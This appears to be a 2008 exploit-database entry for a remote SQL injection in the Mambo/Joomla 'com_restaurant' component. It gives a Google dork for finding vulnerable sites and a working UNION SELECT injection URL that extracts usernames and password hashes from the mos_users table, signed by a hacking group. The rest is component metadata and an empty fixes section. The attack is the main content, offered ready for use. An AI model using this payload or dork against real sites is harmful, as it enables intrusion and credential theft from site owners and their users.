Mambo Component Restaurant 1.0 Remote SQL Injection Vulnerability

2008-01-31 00:00:00

#########################################################################
#
# joomla SQL Injection(com_restaurant)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_restaurant"
#
########################################################################
EXPLOIT :

index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


#########################################################################
# S@BUN www.hackturkiye.com S@BUN
#########################################################################
# S@BUN GOOD LUCKY S@BUN
#########################################################################

<name>Restaurant</name>
<creationDate>02-05-2005</creationDate>
<author>1100cc</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>

<authorUrl>www.1100cc.nl</authorUrl>
<version>1.0</version>
<description>Restaurant is a fully integrated Mambo component.</description>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.